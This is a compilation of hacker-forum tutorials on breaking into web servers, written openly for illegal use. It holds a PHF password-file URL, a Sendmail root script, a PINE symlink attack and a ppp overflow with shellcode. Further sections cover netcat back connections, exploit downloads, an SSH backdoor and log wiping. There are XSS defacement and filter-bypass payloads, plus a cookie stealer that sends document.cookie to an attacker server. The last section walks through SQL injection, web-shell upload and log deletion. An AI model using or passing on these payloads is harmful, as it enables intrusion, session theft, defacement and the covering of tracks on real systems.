The Ultimate Guide Hacking Webpages

Hacking Webpages
The Ultimate Guide

One of the most helpful unix text files in cyberspace but wi
th the mail that we recieved after the release of our famous 36 page Unix Bible w
e realised that unix isn't for everybody so we decided that we should write on an
other aspect of hacking..... Virtual Circuit and Psychotic is proud to release, "
Hacking Webpages With a few Other Techniques."  We will discuss a few various way
s of hacking webpages and getting root.  We are also going to interview and quest
ion other REAL hackers on the subjects.

Getting the Password File Through FTP

Ok well one of the easiest ways of getting superuser access is through anonymous
ftp access into a webpage. First you need learn a little about the password file.
..

root:User:d7Bdg:1n2HG2:1127:20:Superuser
TomJones:p5Y(h0tiC:1229:20:Tom Jones,:/usr/people/tomjones:/bin/csh
BBob:EUyd5XAAtv2dA:1129:20:Billy Bob:/usr/people/bbob:/bin/csh

This is an example of a regular encrypted password file. The Superuser is the par
t that gives you root. That's the main part of the file.

root:x:0:1:Superuser:/:
ftp:x:202:102:Anonymous ftp:/u1/ftp:
ftpadmin:x:203:102:ftp Administrator:/u1/ftp

This is another example of a password file, only this one has one little differen
ce, it's shadowed. Shadowed password files don't let you view or copy the actual
encrypted password.  This causes problems for the password cracker and dictionary
 maker(both explained later in the text). Below is another example of a shadowed
password file:

root:x:0:1:0000-Admin(0000):/:/usr/bin/csh
daemon:x:1:1:0000-Admin(0000):/:
bin:x:2:2:0000-Admin(0000):/usr/bin:
sys:x:3:3:0000-Admin(0000):/:
adm:x:4:4:0000-Admin(0000):/var/adm:
lp:x:71:8:0000-lp(0000):/usr/spool/lp:
smtp:x:0:0:mail daemon user:/:
uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp:
nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
nobody:x:60001:60001:uid no body:/:
noaccess:x:60002:60002:uid no access:/:
webmastr:x:53:53:WWW Admin:/export/home/webmastr:/usr/bin/csh
pin4geo:x:55:55:PinPaper Admin:/export/home/webmastr/new/gregY/test/pin4geo:/bin/
false
ftp:x:54:54:Anonymous FTP:/export/home/anon_ftp:/bin/false

Shadowed password files have an "x" in the place of a password or sometimes they
are disguised as an * as well.

Now that you know a little more about what the actual password file looks like yo
u should be able to identify a normal encrypted pw from a shadowed pw file. We ca
n now go on to talk about how to crack it.

Cracking a password file isn't as complicated as it would seem, although the file
s vary from system to system. 1.The first step that you would take is to download
 or copy the file. 2. The second step is to find a password cracker and a diction
ary maker. Although it's nearly impossible to find a good cracker there are a few
 ok ones out there. I recomend that you look for Cracker Jack, John the Ripper, B
rute Force Cracker, or Jack the Ripper. Now for a dictionary maker or a dictionar
y file...  When you start a cracking prog you will be asked to find the the passw
ord file. That's where a dictionary maker comes in. You can download one from nea
rly every hacker page on the net.  A dictionary maker finds all the possible lett
er combinations with the alphabet that you choose(ASCII, caps, lowercase, and num
eric letters may also be added) .  We will be releasing our pasword file to the p
ublic soon, it will be called, Psychotic Candy, "The Perfect Drug." As far as we
know it will be one of the largest in circulation. 3. You then start up the crack
er and follow the directions that it gives you.

The PHF Technique

Well I wasn't sure if I should include this section due to the fact that everybod
y already knows it and most servers have already found out about the bug and fixe
d it. But since I have been asked questions about the phf I decided to include it
.

The phf technique is by far the easiest way of getting a password file(although i
t doesn't work 95% of the time). But to do the phf all you do is open a browser a
nd type in the following link:

http://webpage_goes_here/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

You replace the webpage_goes_here with the domain. So if you were trying to get t
he pw file for www.webpage.com you would type:

http://www.webpage.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

and that's it! You just sit back and copy the file(if it works).

Telnet and Exploits

Well exploits are the best way of hacking webpages but they are also more complic
ated then hacking through ftp or using the phf. Before you can setup an exploit y
ou must first have a telnet proggie, there are many different clients you can jus
t do a netsearch and find everything you need.
It’s best to get an account with your target(if possible) and view the glitches f
rom the inside out. Exploits expose errors or bugs in systems and usually allow y
ou to gain root access. There are many different exploits around and you can view
 each seperately. I’m going to list a few below but the list of exploits is endle
ss.

This exploit is known as Sendmail v.8.8.4
It creates a suid program /tmp/x that calls shell as root. This is how you set it
 up:

cat << _EOF_ >/tmp/x.c
 #define RUN "/bin/ksh"
 #include<stdio.h>
 main()
 {
    execl(RUN,RUN,NULL);
 }
_EOF_
#
cat << _EOF_ >/tmp/spawnfish.c
 main()
 {
   execl("/usr/lib/sendmail","/tmp/smtpd",0);    
 }                                            
_EOF_
#
cat << _EOF_ >/tmp/smtpd.c
 main()
 {
   setuid(0); setgid(0);
   system("chown root /tmp/x ;chmod 4755 /tmp/x");
 }
_EOF_
#
#
gcc -O  -o /tmp/x /tmp/x.c
gcc -O3 -o /tmp/spawnfish /tmp/spawnfish.c
gcc -O3 -o /tmp/smtpd /tmp/smtpd.c
#
/tmp/spawnfish
kill -HUP `/usr/ucb/ps -ax|grep /tmp/smtpd|grep -v grep|sed s/"[ ]*"// |cut -d" "
 -f1`
rm /tmp/spawnfish.c /tmp/spawnfish /tmp/smtpd.c /tmp/smtpd /tmp/x.c
sleep 5
if [ -u /tmp/x ] ; then
   echo "leet..."
   /tmp/x
fi

and now on to another exploit. I’m going to display the pine exploit through linu
x. By watching the process table with ps to see which users are running PINE,  on
e can then do an ls in /tmp/ to gather the lockfile names for each user.  Watchin
g the process table once again will now reveal when each user quits PINE or runs
out of unread messages in their INBOX, effectively deleting
  the respective lockfile.

  Creating a symbolic link from /tmp/.hamors_lockfile to ~hamors/.rhosts(for a ge
neric example) will cause PINE to create ~hamors/.rhosts as a 666 file with PINE'
s process id as its contents.  One may now simply do an echo "+ +" > /tmp/.hamors
_lockfile, then rm /tmp/.hamors_lockfile.

This was writen by Sean B. Hamor…For this example, hamors is the victim while cat
luvr is the attacker:

hamors (21 19:04) litterbox:~> pine

catluvr (6 19:06) litterbox:~> ps -aux | grep pine
catluvr   1739  0.0  1.8  100  356 pp3 S    19:07   0:00 grep pine
hamors    1732  0.8  5.7  249 1104 pp2 S    19:05   0:00 pine

catluvr (7 19:07) litterbox:~> ls -al /tmp/ | grep hamors
- -rw-rw-rw-   1 hamors   elite           4 Aug 26 19:05 .302.f5a4

catluvr (8 19:07) litterbox:~> ps -aux | grep pine
catluvr   1744  0.0  1.8  100  356 pp3 S    19:08   0:00 grep pine

catluvr (9 19:09) litterbox:~> ln -s /home/hamors/.rhosts /tmp/.302.f5a4

hamors (23 19:09) litterbox:~> pine

catluvr (11 19:10) litterbox:~> ps -aux | grep pine
catluvr   1759  0.0  1.8  100  356 pp3 S    19:11   0:00 grep pine
hamors    1756  2.7  5.1  226  992 pp2 S    19:10   0:00 pine

catluvr (12 19:11) litterbox:~> echo "+ +" > /tmp/.302.f5a4

catluvr (13 19:12) litterbox:~> cat /tmp/.302.f5a4
+ +

catluvr (14 19:12) litterbox:~> rm /tmp/.302.f5a4

catluvr (15 19:14) litterbox:~> rlogin litterbox.org -l hamors

now on to another one, this will be the last one that I’m going to show. Exploita
tion script for the ppp vulnerbility as described by no one to date, this is NOT
FreeBSD-SA-96:15. Works on
  FreeBSD as tested. Mess with the numbers if it doesnt work. This is how you set
 it up:

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#define BUFFER_SIZE     156     /* size of the bufer to overflow */

#define OFFSET          -290    /* number of bytes to jump after the start
                                   of the buffer */

long get_esp(void) { __asm__("movl %esp,%eax\n"); }

main(int argc, char *argv[])
{
        char *buf = NULL;
        unsigned long *addr_ptr = NULL;
        char *ptr = NULL;
        char execshell[] =
        "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f" /* 16
bytes */
        "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52" /* 16
bytes */
        "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"  /* 20
bytes */
        "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";    /* 15
bytes, 57 total */
 
        int i,j;

        buf = malloc(4096);

        /* fill start of bufer with nops */

        i = BUFFER_SIZE-strlen(execshell);

        memset(buf, 0x90, i);
        ptr = buf + i;

        /* place exploit code into the buffer */

        for(i = 0; i < strlen(execshell); i++)
                *ptr++ = execshell[i];

        addr_ptr = (long *)ptr;
        for(i=0;i < (104/4); i++)
                *addr_ptr++ = get_esp() + OFFSET;

        ptr = (char *)addr_ptr;
        *ptr = 0;

        setenv("HOME", buf, 1);

        execl("/usr/sbin/ppp", "ppp", NULL);
}

Now that you’ve gotten root "what’s next?" Well the choice is up to you but I wou
ld recommend changing the password before you delete or change anything. To chang
e their password all you have to do is login via telnet and login with your new a
ccount. Then you just type: passwd  and it will ask you for the old password firs
t followed by the new one. Now only you will have the new pw and that should last
 for a while you can now upload you pages, delete all the logs and just plain do
your worstJ Psychotic writes our own exploits and we will be releasing them soon,
 so keep your eyes open for them. We recommend that if you are serious about lear
ing ethnical hacking that you download our Unix Bible.

Hack Shop Admins And Get CC

This summary is not available. Please click here to view the post.

Stay Anonymous And Secure by SSH Tunneling + TOR [PICTURES]

Hello All,
I know all of you are scared to hack/deface a website without taking precautions.
Most of you must not be having a good VPN which is paid and secure enough to do illegal stuffs. So today i will teach you how to stay completely secure without using any VPN :)

So first ,i would just tell some problems of free VPN's
They are slow and contain ads in most cases
Limited number of proxies
Very insecure
Store logs
Easily Traceable using Logs
Even when they say they do not store logs,they do it
They are not reliable


Tools Needed
TOR
PuTTY

TOR
Free software implementation of second-generation onion routing, a system enabling its users to communicate anonymously on the Internet.

PuTTY
PuTTY is a free implementation of Telnet and SSH for Windows and Unix platforms, along with an xterm terminal emulator.

Open PuTTY.
In The Category, choose Session.
In the Host Name,Type shellmix.com.
Type Port as 30.
Connection Type : SSH.
Now Click Open.
A Black Window will appear.
Enter Username and password as "newuser" [Password appears blank but its typed]

A Black Window Appears
Now enter a Login Name.
Enter a Password.
Enter another password For MySQL Database.
Enter Email Address.
Choose Editor and Enter pico.
Choose language : Enter us.
Choose Vhost : Enter shell.
Enter HDD : Enter hdd1 or hdd2.
Now press Enter to Continue.
Now ,your shell account is ready.Make sure you remember the username and password you created.

SSH TUNNELING
Re-Open PuTTY.
Hostname : shellmix.com.
Port : 22.
Now in category on the left,choose SSH.
Expand it and select Tunnel.
Destination : Dynamic.
Port : Any random port. (Example : 4545)
Click Add.


Click Open.
Enter Login name and Password that you created earlier
Leave this window open
Open TOR
Click Firefox > Options > Advanced > Network > Settings
Click Manual Proxy Configuration
Socks Host : 127.0.0.1
Port : 4545 (The port you used earlier in PuTTY)
Click OK
SSH Tunnel Is Ready.Go to http://www.ip2location.com/ and verify your fake IP

Thanks for reading my tutorial
Hope you will comment like and rep :)

Learn Root - Totally Explaind

#So Lets Start...

These are Some Basic Questions asked by myself as a n00b :P

# What is rooting ?
A. Getting access to the user => "root", the main admin of the site.


# What is the need of rooting ?
A. Getting master admin privillages of Servers 


Things you need



# A Shell on a Website
# An Exploit
# Log cleaner
# Ssh Backdoor
# Netcat
# A Brain

Simply you can seach on http://www.google.com for these, except BRAIN and SHELL 


Getting Back Connection to the servers


Open command prompt, and go to NetCat Path, Type
"cd netcat.exe"

ok Open your Shell in your browser, go to the back connection tab, if it is not there get a shell like "WSO 2.3" or Any other
thats your choice....

Specify your "ip & port as 2121". press connect, now you'll get a shell to the server, you can give commands to the server through that shell.

now came back to netcat and type "nc -l -v -p 2121"

it will give you this output:
Code:
c:\netcat>nc -l -v -p 2121
listening on [any] 2121 ...

Getting a Right exploit for the servers


Type : Uname -a & hit enter.
It'll look something like this:

Code:
[admin@www.target.com /home/saijyoti/public_html/cgi-bin]$ uname -a
Linux dualxeon09.ns5.999servers.com 2.6.18-194.26.1.el5 #1 SMP Tue Nov 9 12:54:20 EST 2010 x86_64 x86_64 x86_64 GNU/Linux

You have noted, It shows the kernal version of the server is: 2.6.18-194.26.1.el5
& Year is 2010.

You need to find a perfect exploit for it. you can find them at:-
$ Exploit-db.com
$ Packetstormsecurity.org
$ Th3-0utl4ws.com
$ Leetupload.com

Compiling & executing exploits


Now I've got a exploit, & it is written in C. So I can't execute it by just uploading. but I need to compile it.

Before proceeding further, Cd into the tmp directory, because it is always writable. So type: Cd /home/XXXXX/public_html/tmp
// The path may be different, replace it with yours.

So first I'll get the exploit on the server, So I type : Wget http://exploitsite.net/2010-exploits/exploit.c
// Note: There is no such site, I'm just taking it to show you.
It'll look something Like this:-

Code:
admin@www.target.com /home/target_usernemr/public_html/tmp]$ wget http://exploitsite.net/2010-exploits/exploit.c
--2011-01-25 08:21:43-- http://exploitsite.net/2010-exploits/exploit.c
Resolving www.exploitsite.net... 199.58.192.192
Connecting to www.exploitsite.net|199.58.192.192|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15088 (15K) [text/x-csrc]
Saving to: `exploit.c'


now change the permission of the exploit to 777.
Type: "Chmod 777 exploit.c"

Now the exploit is On my server, I just need to compile & execute it.
So, I'll give the command: "gcc -o exploit exploit.c"
It'll compile & save the exploit as >> exploit

Next step is to execute it So we'll type: "./exploit"


here it'll show different process...
: #
: #
got root you m0f0 !! [<example]

Now it say got root. Let's Check is it true,
Type: "whoami"

then it will say "root"

like: uid=0(root) gid=0(root) groups=0(root)

type "su" to get full privilages !


Installing Backdoors

type: "Wget http://www.urlofbackdoor.com/sshdoor.zip"


Then Type,
Unzip Sshdoor.zip
Then, => Cd sshdoor
Then type, ./run pass port
^ replace pass with your password, & a port.

Now connect with putty & enjoy root privileges. 

Methods to execute exploits written in other languages


C exploit

----------------------
gcc -o exploit exploit.c
chmod +x exploit
./exploit
----------------------

Perl Exploits

---------------
perl exploit.pl
---------------

Python

------------------
python exploit.py
------------------

php

-----------------
php exploit.php
-----------------

zip

----------------
unzip exploit.zip
./run
----------------

Just fo Education Purpose !!

Cross Site Scripting (XSS) N00b

To start finding these Vulnerabilities you can start checking out Blogs, Forums, Shoutboxes, Comment Boxes, Search Box's, there are too many to mention.

Using 'Google Dorks' to make the finding easyier, Ok if you wanna get cracking, goto google.com and type inurl:"search.php?q=" now that is a common page and has alot
of results. Also note that most sites have XSS Vulnerabilities, its just having a good
eye, and some good knowledge on how to bypass there filteration.

Basics of XSS
Well now lets start learning some Actual Methods, the most common used XSS
injection is :

<script>alert("W1n_h4ck3r")</script>

now this will alert a popup message, saying "W1n_h4ck3r" without quotes.

So,use "search.php?q=" and you can simple try the following on a website with the
 same thing,

http://website.com/search.php?q=<script>alert("W1n_h4ck3r")</script>

There are good chances of it working, but dont be worried if it dont, just try diffrent sites. You can insert HTML not just javascript :

http://website.com/search.php?q=<br><br><b><u>W1n_h4ck3r</u></b>



How to Deface a Website using XSS ?
Well now you understand how XSS works, we can explain some simple XSS deface methods, there are many ways for defacing i will mention some of the best and most used, the first one being IMG SCR, now for those of you who dont know html, IMG SCR
is a tag, that displays the IMAGE linked to it on the webpage.

<html><body><IMG SRC="http://website.com/yourDefaceIMAGE.png"></body></html>

ok now if you change the link to a valid picture link, and save it and run it you will see what i mean. Right now say you have found a Shoutbox, Comment box, or anything
that shows your data after you submitted it you could insert the following to make the picture display on the page.

<IMG SRC="http://site.com/yourDefaceIMAGE.png">

The other tags are not needed has the page will already have them. Ok it helps to
make your picture big so it stands out and its clear the site got hacked. Another
method is using FLASH videos, its the same has the method below but a more stylish deface.

<EMBED SRC="http://site.com/xss.swf"

That will execute the flash video linked to it. Or maybe using a pop or redirection as :
<script>window.open( "http://tools-andtipsbywinhacker.blogspot.com/" )</script>

There are many others ways that you can found using Google or other website. Mine purpose is to make you understand the concept :)

How to Cookie Stealing using XSS ?
I decided to add this has its the most usefull method of XSS. First learn how to make cookie logger from here: How To Make A Cookie Stealer Php script ?

ok now you have it save it has a .php file and upload to your server, remember to
create the file 'log.txt' too
and chmod it to 777, ok now find a XSS vulnerable website, any attack type will do.
ok now your gonna want to insert this code.

window.location = "http://yourServer.com/cookielogger.php?c="+document.cookie


or


document.location = "http://yourServer.com/cookielogger.php?c="+document.cookie

now when user visits the page that got injected too, they will be sent to the site, and cookie will be stolen
the second one is more stealth. Watch your file now for cookies, then you can hijack there session :D

but now you ask what if my site has not got, this kind of attack, it only shows data once and dont store it. Well lets say we had a page search.php?q= we can use the following code to make a maliouc url from it and maybe hex, base64 encode it so people cant see the code

http://site.com/search.php?q=document.location = "http://yourServer.com/cookielogger.php?c="+document.cookie

---

How to Bypass Filtration ?
Alot of sites may seem vulnerable but not executing the code, well to solve this read
this. Some common methods to bypass filtration is

')alert('xss');


or


");alert('xss');

that will do the same thing has <script>alert("XSS")</script> on a vulnerable server.
You can also try hexing or base64 encoding your data before you submit, Please note
 its bad practice to use alert("XSS") to test for XSS, because some sites block the
keyword "XSS" before so we using "W1n_h4ck3r".

Some other ways to bypass filtration
website.com/search.php?q="><script>alert('W1n_h4ck3r')</script>
website.com/search.php?q="><script>alert("W1n_h4ck3r")</script>
website.com/search.php?q="><script>alert("W1n_h4ck3r");</script>
website.com/search.php?q="><script>alert(/W1n_h4ck3r");</script>
website.com/search.php?q=//"><script>alert(/W1n_h4ck3r/);</script>
website.com/search.php?q=abc<script>alert(/W1n_h4ck3r/);</script>
website.com/search.php?q=abc"><script>alert(/W1n_h4ck3r/);</script>
website.com/search.php?q=abc"></script><script>alert(/W1n_h4ck3r/);</script>
website.com/search.php?q=abc//abc"></script>alert(/W1n_h4ck3r/);</script>
website.com/search.php?q=000"><script></script><script>alert(W1n_h4ck3r);</script>
website.com/search.php?q=000abc</script><script>alert(/W1n_h4ck3r/);</script>
website.com/search.php?q=--<script>"></script>alert(/W1n_h4ck3r/);</script>
website.com/search.php?q=pwned<script>document.write('W1n_h4ck3r');</script>
website.com/search.php?q=pwned</script><script>document.write(W1n_h4ck3r);</script>
website.com/search.php?q=pwned')alert(W1n_h4ck3r);//
website.com/search.php?q=pwned";)alert(W1n_h4ck3r);//
website.com/search.php?q=pwned");alert(/W1n_h4ck3r/);//
website.com/search.php?q=pwned//"></script><script>location.href='javascript:alert(/W1n_h4ck3r/);</script>
website.com/search.php?q="><img src='javascript:alert('W1n_h4ck3r');'>
website.com/search.php?q="><script src='http://Evil js'</script>

---

Advanced XSS - way to bypass magic quotes filtration:
Ok now we are going to learn about some good techniqes. I have came across many
sites where 'Magic Quotes' is on and therfore rendering some commands useless. Fear not, i have come up with a way using char codes (Decimals), to convert char code to Ascii. The functions to turn CharCodes (Decimals) into ASCII, you can find a complete table here

ASCII LINK
ASCII LINK 2

This will help you write what you want, In my examples ill be writing "HOC" this is the following code

72 79 67

Ok now we got the Decimal value of our string, we need to know what function in javascript converts this.

String.fromCharCode()

is suitable for this kinda things, its easy to setup, im gona give it my args below.

String.fromCharCode(72, 79, 67)

Ok now "String.fromCharCode(72, 79, 67)" Is a JAVA (ASCII) way of saying "HOC".
And to use this with alerts etc, you dont need to use quotes, as it acts as a variable.

<script>alert(String.fromCharCode(72, 79, 67))</script>

For More Script Coding Of XSS Visit

-: Reveal *****(Asterisk) Passwords Using Javascript N00b Friendly:-

Want to Reveal the Passwords Hidden Behind Asterisk (****) ? 


Follow the steps given below- 


1) Open the Login Page of any website. (eg. http://mail.yahoo.com)  


2) Type your 'Username' and 'Password'. 


3) Copy and paste the JavaScript code given below into your browser's address bar and press  
'Enter'. 


                    javascript: alert(document.getElementById('Passwd').value);  


4) As soon as you press 'Enter', A window pops up showing Password typed by you..! 


 Note :-   This trick may not be working with firefox.   

Solution How to compile Exploits For N00b Friendlly

This summary is not available. Please click here to view the post.

Login Form Bypass using Mantra Security Toolkit

Hi All,

In this tutorial we will try to bypass login form of vulnerable website using Mantra Security Toolkit

What all you need

1. Mantra Security Toolkit - Download

2. A vulnerable website. I'm using a modified version of LAMPSecurity CTF6

Let's begin,

Step 1:

I'm on the home page of the website now

http://192.168.132.128/

Step 2:

Login form of the website

http://192.168.132.128/?action=login

Step 3:

Now we will test the input forms against SQL injection. For that we can use SQL Inject Me tool. It can be launched from Tools > SQL Inject Me > Open SQL Inject Me Sidebar




Step 4:

You can see SQL Inject Me sidebar on the right




Step 5:

I'm checking all the fields to test.




Step 6:

I clicked on "Test all forms with all attacks"




Step 7:

Test results says that none of the fields are vulnerable to SQL injection attack. So its confirmed that the website is sanitizing the input





Step 8:

Now we will try to see what type of sanitizing mechanism the website is employed. For that we will use Firebug. It can be launched by going to Tools > Firebug > Open Firebug





Step 9:

Now that firebug is open. I'm enabling Inspect mode of Firebug clicking on the inspect icon (second one) on the top left corner.





Step 10:

I clicked on the login from and Firebug highlighted respective source code. It shows that some type of local JavaScript is used to sanitize the input.





Step 11:

For bypassing it, we will use Live HTTP Headers. It can be launched either from sidebar or by going to Tools > Live HTTP Headers





Step 12:

Now you can see Live HTTP Headers. The Capture check box must be checked.





Step 13:

I went back to the login from and entered some sample values there and pressed on Log In




Step 14:

Now I again went back to Live HTTP Headers. We can clearly see that it captured the session.





Step 15:

I scrolled it up to find the username, password data field. I clicked on it and pressed on Replay button





Step 16:

I'm changing the value little bit to bypass the authentication and clicking on Replay button




Step 17:
hmmm. I got an error message. Looks like I should modify the injected code.



Step 18:

I modified the code




Step 19:

No luck




Step 18:

I changed the value again and pressed on Replay button




Step 19:

Voila. I'm successfully authenticated.




Step 20:

Now that I have got admin access



If you wish to completely root the whole server, you can go to this post and follow steps from step 24 

Advanced SQL Injection Tutorial - Complete website rooting

Hi All,

In this tutorial we will be rooting a vulnerable web server using Mantra Security Toolkit.

What all you need

1. Mantra Security Toolkit - Download

2. A vulnerable website. I'm using a modified version of LAMPSecurity CTF6

3. Any PHP Shell you are comfortable with
- Google for "c99 shell"

Now the process


Step 1:

I'm on the home page of the website now

http://192.168.132.128/

Step 2:

I went through all the pages of web site and found a page with URL input

http://192.168.132.128/?id=13

Step 3:

I launched Hackbar by pressing F9




Step 4:

The power of single quote. I'm checking the web site is vulnerable or not by putting a ' at the end of the URL and pressing Execute.

http://192.168.132.128/?id=13'

Since the page content is different from the previous one. I can make sure that the web page is vulnerable.


Step 5:

Lets find out the number of tables

http://192.168.132.128/?id=13 order by 1

Step 6:

I have to keep on increasing the last number till I see any changes in the page. In usual practice its gonna be a tedious task since there will be hundreds and thousands of tables if not more. But with this tool I can simply press on + button till I see any changes on the webpage

http://192.168.132.128/?id=13 order by 7

Step 7:

I went up to 7 and no change till now

http://192.168.132.128/?id=13 order by 7

Step 8:

I'm on 8 now and I can see the page changed

http://192.168.132.128/?id=13 order by 8

Step 9:

Now lets go ahead and make a UNION statement. I just went to SQL > UNION SELECT STATEMENT





Step 10:

I provided the number of tables. Since I got a different page on table 8, I can make sure that table 8 does not exists and there are only 7 tables





Step 11:

Wonderful. I can see some numbers on the page now. Those are the vulnerable columns. Lets take the number 2

http://192.168.132.128/?id=13 UNION SELECT 1,2,3,4,5,6,7

Step 12:

I replaced number 2 in URL with another SQL command, it got executed and result is displayed on the page

http://192.168.132.128/?id=13 UNION SELECT 1,user(),3,4,5,6,7

The current user is cms_user@localhost



Step 13:

Lets find out the version of the database. I replaced 2 in the URL with version() command

http://192.168.132.128/?id=13 UNION SELECT 1,version(),3,4,5,6,7

5.0.45 is the version



Step 14:

Let me list all the tables

http://192.168.132.128/?id=13 UNION SELECT 1,table_name,3,4,5,6,7 from information_schema.tables

From this list I found "user" is an interesting table



Step 15:

Now I listed all the columns and its a big list

http://192.168.132.128/?id=13 UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columns

Step 16:

I want columns from the table "user" and nothing else

http://192.168.132.128/?id=13 UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columns where table_name='user'

Step 17:

Lets find the user name

http://192.168.132.128/?id=13 UNION SELECT 1,user_username,3,4,5,6,7 from user

Step 18:

Now, what about password

http://192.168.132.128/?id=13 UNION SELECT 1,user_password,3,4,5,6,7 from user

Its encrypted



Step 19:

Decrypting the password. I copied the MD5 hash, pasted it into hackbar and went to Encryption > MD5 Menu > send to > md5.rednoize.com





Step 20:

Voila.!!! I got the password





Step 21:

Finding the log in page. Its was right in front of me




Step 22:

Logging in with the credentials I have




Step 23:

Greetings.!!!





Step 24:

I'm an admin now. Look at my powers.





Step 25:

Let me add an event





Step 26:

and of course I want to upload a picture





Step 27:

Lets see it allows me to upload the shell or not





Step 28:

Now I'm pressing on "Add Event" button





Step 29:

Nice. Looks like it's got uploaded





Step 30:

Let's see where the shell got uploaded to





Step 31:

I'm trying to get the default upload location







Step 32:

Looks like I got it



Let me click on the c9shell.php file I just uploaded



Step 33:

Voila. I have shell access





Step 34:

I simply clicked on the up button to get the root folder



Now I can do whatever I wish. Deface the website, maintaining access or what ever. But its out of the scope of current tutorial



Step 35:

What I'm interested is the log folder






Step 36:

I clicked on the log.log file and it has the logs of my noisy SQL injection attacks





Step 37:

Let me go back and edit the log file







Step 38:

I deleted complete log entries. Now saving it.





Step 39:

Nice. Log file is empty now





Step 40:

Now. Lets remove the c99 shell by pressing on Self Remove





Step 41:

Confirmed.!!!





Step 42:

OK. Good Bye C99





Step 43:

Well. It got deleted itself

H4qqy H4ck!ng